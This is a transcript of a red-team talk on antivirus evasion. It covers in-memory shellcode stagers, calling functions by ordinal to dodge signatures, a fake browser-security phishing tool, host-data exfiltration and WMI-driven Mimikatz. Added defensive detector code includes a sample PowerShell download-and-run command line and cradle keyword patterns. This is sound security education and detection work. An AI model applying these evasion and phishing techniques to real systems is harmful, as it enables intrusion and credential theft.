A Battle Against the Industry - Beating Antivirus for Meterpreter and More


Transcript of A Battle Against the Industry - Beating Antivirus for Meterpreter and More

Page 1

A Battle Against the Industry - Beating Antivirus for Meterpreter and More

@ChrisTruncer

Page 2

Whoami

■ A systems administrator turned red teamer
■ Florida State Seminole
■ Open Source Software Developer
  ■ Veil-Framework
  ■ EyeWitness
  ■ Egress-Assess
  ■ Just-Metadata

Thanks Robin :)

Page 3

Why am I here today?

■ Share some laughs at Antivirus :)
■ Give a background on stagers
■ Showcase a Veil-Evasion signature bypass
  ■ Anyone can do this..
■ Talk about developing your own code
  ■ Case studies on previously developed code

Page 4

Stagers

Page 5

What are stagers?

■ Can be referred to as “stage 1”
■ Might be msfvenom, Veil-Evasion, etc. output
■ Goal is typically to inject shellcode into memory
■ Shellcode usually downloads and executes a reflectively injectable dll
  ■ …but it can also do anything you want if you write it :)

Page 6

What are stagers?

■ Stagers are really used as loaders for your real malware
■ They’re designed to be expendable and tiny
■ Don’t give away your engineered malware by dropping it to disk
  ■ Load everything in memory

Page 7

What are stagers?

■ Any language that has the ability to access Windows functions can be used to write a stager!
■ Pretty cool, and allows us to expand out from traditional “Windows Languages”
■ Interacting with Windows functions can seem daunting, but isn’t all that bad
  ■ 4 or 5 function calls

Page 8

Function Calls

Page 9

Stagers in a Nutshell

■ Allocate memory to store the shellcode being injected, and apply proper memory permissions
■ Copy the shellcode into the allocated memory
■ Create a thread to run the shellcode copied into the process’s memory
■ Wait for the thread to complete running before exiting the program

Page 10

Windows API Calls

■ Most stagers utilize VirtualAlloc to allocate memory
■ This talk shows an alternate way to allocate memory that isn’t heavily utilized
■ It might be a better way to fly under the radar

Page 11

HeapCreate

■ Creates a private heap object that can be used by the process creating the heap
■ Specify the memory protections
■ Requires the size of the heap that will need to be allocated
  ■ Shellcode length
■ Max size of allocated memory
  ■ I do twice the shellcode length

Page 12

HeapAlloc

■ Allocates memory from the previously created heap object
■ Receives a handle to the previously allocated heap object
■ Specify the total amount of space that you are allocating for shellcode

Page 13

RtlMoveMemory

■ Places the shellcode you are injecting into the allocated heap space
■ Needs a pointer to where data (shellcode) will be copied to (HeapAlloc output)
■ Needs a pointer to the data (shellcode)
■ Needs the length of the shellcode being injected

Page 14

CreateThread

■ This function creates a new thread within the current process to execute the data (shellcode) that was injected
■ Requires a pointer to the data (shellcode) that will run in the new thread
■ Schedule the thread to execute immediately

Page 15

WaitForSingleObject

■ This function is like a blocking call to prevent the program from exiting immediately
■ Requires a handle to the thread that was created by the CreateThread function
■ Requires a value (-1) to specify that the program should wait to exit until the thread exits

Page 16

Stagers in a Nutshell (Repeated)

■ Allocate memory to store the shellcode being injected, and apply proper memory permissions
■ Copy the shellcode into the allocated memory
■ Create a thread to run the shellcode copied into the process’s memory
■ Wait for the thread to complete running before exiting the program

Page 17

Page 18

Ordinal Values

Page 19

Ordinal Values

■ Using ordinal values to reference functions is an old-school but effective way to bypass antivirus detection
■ Picture an array or Python list containing functions. To reference a specific function, you reference it by its location within the array/list
■ Same concept for bypassing AV via ordinal values

Page 20

Ordinal Values

■ Rather than calling HeapAlloc or RtlMoveMemory by name, why not reference it by its ordinal value?
■ This is still a call to the same function, but just via a different method
■ Check out this code

Page 21

Page 22

Page 23

Page 24

Ordinal Values

■ Simply referencing function calls by their ordinal value vs. name can bypass anti-virus
■ NOTE: Ordinal values can change between both OSs and Service Packs. You will need to target your payload to the OS and Service Pack when referencing via ordinal value.
■ So…. how do we find these ordinal values?

Page 25

Page 26

Ordinal Values

■ PEView is a free program which lets you inspect PE files, dlls, etc.
■ You can use this to load kernel32.dll, search for the functions that you are calling, and obtain their ordinal value
■ PEView provides the base 16 value, so be sure to convert it to its base 10 value.
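The five-call loader sequence from the "Stagers in a Nutshell" and Windows API slides, together with the ordinal-call trick just described, looked at from the detection side. This is an added example and not code from the talk or from Veil-Evasion: a small Python checker that takes a sandbox-style API trace (constructed here), first maps kernel32 calls made by ordinal back to names using a hypothetical ordinal table for one labelled OS build (real values must be read from that build's kernel32.dll export directory, as the PEView slide describes, and differ across OS versions and service packs), then looks for HeapCreate, HeapAlloc, RtlMoveMemory, CreateThread and WaitForSingleObject in that order and reports whether the heap was created with HEAP_CREATE_ENABLE_EXECUTE, which is the "memory protection" the HeapCreate slide refers to. The trace format, the handles and addresses in it, and the ordinal table are all assumptions made for the example.

```python
"""Added example (not from the talk or Veil-Evasion): a detection-side checker
for the heap-based stager sequence described in the slides, run over a
sandbox-style API trace. Calls recorded by ordinal ("kernel32!#0x3C9(...)")
are resolved to names first, so an ordinal-only loader is judged by the same
rule as a name-based one.

All inputs below are constructed. The ordinal table is HYPOTHETICAL and
stands for one specific OS build; real ordinals must be read from that
build's kernel32.dll export directory and change across OS versions and
service packs, as the slides warn.
"""
import re

# Real Windows flag: HeapCreate(flOptions, ...) with this bit set yields an
# executable heap, which is the "memory protection" a stager needs.
HEAP_CREATE_ENABLE_EXECUTE = 0x00040000

# HYPOTHETICAL ordinal -> name table for a single, labelled build.
KERNEL32_ORDINALS_HYPOTHETICAL = {
    0x2F1: "CreateThread",
    0x3C6: "HeapAlloc",
    0x3C9: "HeapCreate",
    0x58A: "WaitForSingleObject",
}

# The loader pattern from the "Stagers in a Nutshell" slide, in call order.
STAGER_SEQUENCE = ["HeapCreate", "HeapAlloc", "RtlMoveMemory",
                   "CreateThread", "WaitForSingleObject"]

# One trace line: module!name(args) or module!#ordinal(args); args hex or dec.
CALL_RE = re.compile(r"^(?P<mod>\w+)!(?P<fn>#?\w+)\((?P<args>.*)\)$")


def resolve_call(line, ordinals=KERNEL32_ORDINALS_HYPOTHETICAL):
    """Parse one trace line into (module, function_name, [int args]).

    Ordinal references ("#0x3C9" or "#969") are mapped to names via the
    build's table; unknown ordinals stay visible as "module!#N" so that a
    lookup failure never silently hides a call.
    """
    m = CALL_RE.match(line.strip())
    if not m:
        return None
    mod, fn = m["mod"].lower(), m["fn"]
    if fn.startswith("#"):
        ordinal = int(fn[1:], 0)
        name = ordinals.get(ordinal) if mod == "kernel32" else None
        fn = name if name is not None else f"{mod}!#{ordinal}"
    args = [int(a.strip(), 0) for a in m["args"].split(",") if a.strip()]
    return mod, fn, args


def find_stager_sequence(trace, ordinals=KERNEL32_ORDINALS_HYPOTHETICAL):
    """Report whether the five-call loader sequence appears in order (other
    calls may sit in between) and whether the heap it used was executable."""
    calls = [c for c in (resolve_call(l, ordinals) for l in trace) if c]
    matched, want = [], 0
    for i, (_mod, fn, _args) in enumerate(calls):
        if want < len(STAGER_SEQUENCE) and fn == STAGER_SEQUENCE[want]:
            matched.append(i)
            want += 1
    found = want == len(STAGER_SEQUENCE)
    exec_heap = False
    if found:
        heap_args = calls[matched[0]][2]  # HeapCreate's arguments
        exec_heap = bool(heap_args and heap_args[0] & HEAP_CREATE_ENABLE_EXECUTE)
    return {
        "sequence_found": found,
        "executable_heap": exec_heap,
        "ordinal_calls": sum(1 for l in trace if "!#" in l),
        "resolved_names": [fn for _m, fn, _a in calls],
    }


# Constructed trace of a loader that follows the slides and calls kernel32 by
# ordinal: HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0x200, 0x400), i.e. a maximum
# size of twice the shellcode length, then HeapAlloc, RtlMoveMemory,
# CreateThread and WaitForSingleObject(hThread, 0xFFFFFFFF = INFINITE).
STAGER_TRACE = [
    "kernel32!GetModuleHandleA(0x0)",
    "kernel32!#0x3C9(0x40000, 0x200, 0x400)",
    "kernel32!#0x3C6(0x1A0000, 0x0, 0x200)",
    "ntdll!RtlMoveMemory(0x1A0590, 0x402000, 0x200)",
    "kernel32!#0x2F1(0x0, 0x0, 0x1A0590, 0x0, 0x0, 0x0)",
    "kernel32!#0x58A(0x9C, 0xFFFFFFFF)",
]

# Constructed benign trace: a non-executable heap and no thread is started.
BENIGN_TRACE = [
    "kernel32!HeapCreate(0x0, 0x1000, 0x0)",
    "kernel32!HeapAlloc(0x1B0000, 0x8, 0x100)",
    "ntdll!RtlMoveMemory(0x1B0590, 0x403000, 0x100)",
    "kernel32!HeapFree(0x1B0000, 0x0, 0x1B0590)",
]

if __name__ == "__main__":
    for label, trace in (("stager", STAGER_TRACE), ("benign", BENIGN_TRACE)):
        print(label, find_stager_sequence(trace))
```

The point of resolving ordinals before matching is the one the slides make in reverse: a name-based rule that never sees "HeapCreate" because the import was by ordinal is blind, while a rule that keys on the executable-heap flag and the order of calls is indifferent to how the function was reached. A lookup table built from the wrong build would resolve to wrong names, so the checker keeps unresolved ordinals visible rather than dropping them.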

Page 27

Veil’s Approach

Page 28

How Veil-Evasion Bypasses AV

■ Completely open sourced
■ Can query VT’s API
■ Veil-Evasion attempts to bypass AV through a few different techniques
  ■ Obfuscated Code
  ■ Encrypted Code
  ■ Non-standard languages for binaries

Flat vs. encrypted code

Page 29

How Veil-Evasion Bypasses AV

■ Languages that Veil-Evasion supports
  ■ Python
  ■ Perl
  ■ PowerShell
  ■ C#
  ■ C
  ■ Go
  ■ Ruby

Page 30

How Veil-Evasion Bypasses AV

■ Using a non-standard language (read not C, C++, or C#) resulted in payloads that immediately bypassed antivirus
■ AV just didn’t understand how to properly inspect these executables
■ Example:
  ■ C Flat vs. Python Flat

Page 31

Page 32

Page 33

Ordinal Values

■ Simply changing the language the payload was written in completely bypassed all AV signatures.

Page 34

Antivirus Signature

Page 35

Veil-Evasion

■ After about 1 year, Veil-Evasion finally had its first signature!
■ I was informed about this on IRC and wanted to check it out.

Page 36

Page 37

Page 38

Page 39

Page 40

Page 41

Page 42

Page 43

Custom Code

Page 44

Browser Check Scenario

■ Instead of sending just some random executable when phishing, what if you promise to secure their system?
■ Developed by Hunter Hardman (@t3ntman)
■ Written in C#
■ Custom code, so it bypasses every single AV out there (at least before Hunter made it public :))

Page 45

Page 46

Browser Check Scenario

■ This works great for phishing scenarios
■ We target individuals impersonating their IT Security, or just IT staff
■ Warn them about the dangers of misconfigured/old browsers
■ Give them a solution!

Page 47

Browser Check Scenario

■ Once the program starts, it spawns PowerShell and executes any code you give it
  ■ Meterpreter or Beacon!
■ It’s fully functional; once the user tells it to start, they see a progress bar go to completion.
■ Once complete, it lets them know their system is secure!

Page 48

Browser Check Scenario

■ Delivery is dependent upon the situation
■ We’ve created websites hosting it over HTTPS to make users think it is secure
■ Created fake “secure file transfer” websites
■ Rarely, we’ve sent just the executable
■ For our initial access, this has been pretty successful, and the lack of AV detection helps the user trust the program

Page 49

Browser Check Scenario

■ Currently available for review at https://github.com/t3ntman/BrowserCheck

Page 50

Enumerator

Page 51

Enumerator

■ Customer didn’t want actual shellcode injection or infection of their endpoints
■ Wanted intel collection to act as proof of “compromise”
■ I developed a script that would gather host information and would POST the data out over HTTPS to our server.

Page 52

Enumerator

■ Information gathered
  ■ System hostname
  ■ IP address(es)
  ■ System drives and drive space
  ■ Current user
  ■ Tasklist

Page 53

Page 54

Page 55

Github

■ https://github.com/ChrisTruncer/PenTestScripts/blob/master/enumeration.py
■ https://github.com/ChrisTruncer/PenTestScripts/blob/master/enum_server.py

Page 56

WMIOps

Page 57

WMIOps

■ Why waste engineering time developing a RAT, hoping it never gets burnt? Just leverage built-in functionality!
■ Anything useful for system administration is just as easily repurposed for illegitimate use :)
■ Just live off the land!

Page 58

WMIOps

■ Used WMI much?
■ WMI is installed and running by default on Windows systems since Windows 2000
■ It does require local admin privileges on the targeted system
  ■ But this can make it great for post-exploitation

Page 59

WMIOps

■ WMIOps - A PowerShell based tool which uses WMI to carry out various actions on targeted systems.
■ Developed in PowerShell - we can load it in memory and execute a variety of different tasks

Page 60

WMIOps

■ Want to see which users have active processes on a system?
  ■ Might be good to know where you can snag creds!
■ Rather than needing to compromise the machine, just run a simple WMI query with WMIOps!

Page 61

Page 62

WMIOps

■ Now that we know who is on the system, want to run Mimikatz to capture user credentials?
■ Traditionally we’d have to compromise it, and load up Mimikatz.
■ Why not leverage WMI to do everything in memory without needing the use of a RAT?

Page 63

WMIOps

■ Invoke-RemoteScriptWithOutput
  ■ Spawn PowerShell on the remote system
  ■ Download the PowerShell script in memory
  ■ Runs the user specified function
  ■ Saves output
  ■ Performs a POST over HTTPS to a user specified IP address
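What the Invoke-RemoteScriptWithOutput flow looks like from the endpoint's side, as an added example that is not part of WMIOps or the talk. WMI-driven remote execution lands on the target as the WMI provider host (WmiPrvSE.exe) becoming the parent of powershell.exe, and an in-memory script download shows up as a download-and-run cradle on that process's command line. The Python below parses a handful of constructed process-creation events (their key=value layout is loosely modelled on Sysmon Event ID 1 fields; the host names, user names, paths and the 198.51.100.7 address are made up for the example) and flags events where WmiPrvSE.exe spawns a script host, or where PowerShell is started with a download cradle.

```python
"""Added example (not part of WMIOps or the talk): a detection pass over
process-creation events for PowerShell spawned through WMI, as the
Invoke-RemoteScriptWithOutput slide describes.

The events below are constructed for this example. Their key=value layout is
loosely modelled on Sysmon Event ID 1 fields (UtcTime, Computer, User,
ParentImage, Image, CommandLine); values containing spaces are double-quoted.
"""
import re

# Constructed events. Event 2 and 4 are the WMI-driven cases; 1 and 3 are
# ordinary interactive activity that should not fire.
EVENTS = [
    r'''UtcTime="2015-09-01 14:02:11" Computer=WS01 User=CORP\alice ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\notepad.exe CommandLine="notepad.exe notes.txt"''',
    r'''UtcTime="2015-09-01 14:05:37" Computer=WS02 User=CORP\svc_admin ParentImage=C:\Windows\System32\wbem\WmiPrvSE.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell.exe -NoP -W Hidden -c IEX (New-Object Net.WebClient).DownloadString('https://198.51.100.7/i.ps1')"''',
    r'''UtcTime="2015-09-01 14:06:02" Computer=WS03 User=CORP\bob ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell.exe -File C:\scripts\backup.ps1"''',
    r'''UtcTime="2015-09-01 14:07:45" Computer=SRV01 User="NT AUTHORITY\SYSTEM" ParentImage=C:\Windows\System32\wbem\WmiPrvSE.exe Image=C:\Windows\System32\cmd.exe CommandLine="cmd.exe /c whoami > C:\Windows\Temp\out.txt"''',
]

# key=value, where the value is either "quoted with spaces" or a bare token.
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line):
    """Turn one key=value line into a dict; quoted values keep their spaces."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in FIELD_RE.finditer(line)}


def basename(path):
    """Last path component, lower-cased: C:\\...\\WmiPrvSE.exe -> wmiprvse.exe."""
    return path.rsplit("\\", 1)[-1].lower()


WMI_PROVIDER_HOST = "wmiprvse.exe"
# Interpreters that the WMI provider host has little reason to launch directly.
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Common PowerShell download-and-run cues, matched case-insensitively.
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"
    r"|invoke-expression|\biex\b|\s-enc\w*", re.I)


def score_event(ev):
    """Return the reasons (possibly none) an event looks like WMI-driven
    remote execution: WmiPrvSE.exe parenting a script host, and/or a
    download cradle on a PowerShell command line."""
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    reasons = []
    if parent == WMI_PROVIDER_HOST and image in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {image}")
    if image == "powershell.exe" and CRADLE_RE.search(ev.get("CommandLine", "")):
        reasons.append("download/execute cradle on the PowerShell command line")
    return reasons


def find_wmi_remote_exec(lines):
    """Run score_event over raw lines; one finding per suspicious event."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        reasons = score_event(ev)
        if reasons:
            findings.append({
                "time": ev.get("UtcTime"),
                "computer": ev.get("Computer"),
                "user": ev.get("User"),
                "image": basename(ev.get("Image", "")),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in find_wmi_remote_exec(EVENTS):
        print(finding)
```

The parent-child relationship is the more durable signal of the two: the slides stress that WMIOps needs local admin on the target and runs everything in memory, so there is no dropped file to scan, but the process tree on the endpoint still records that WmiPrvSE.exe started the interpreter. The command-line cradle check is a secondary cue, since the slides' "download the PowerShell script in memory" step is exactly what those cues describe, and it also catches the same behaviour when it arrives through a different parent.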

Page 64

Page 65

Page 66

WMIOps

■ WMIOps can do other tasks as well
  ■ Run commands
  ■ Kill processes
  ■ Search for files
  ■ Transfer files
  ■ Etc.

Available here: https://github.com/ChrisTruncer/WMIOps

Page 67

Thanks! Any questions?

Reach out to me!
■ @ChrisTruncer
■ [email protected]
■ https://www.christophertruncer.com
■ https://www.github.com/ChrisTruncer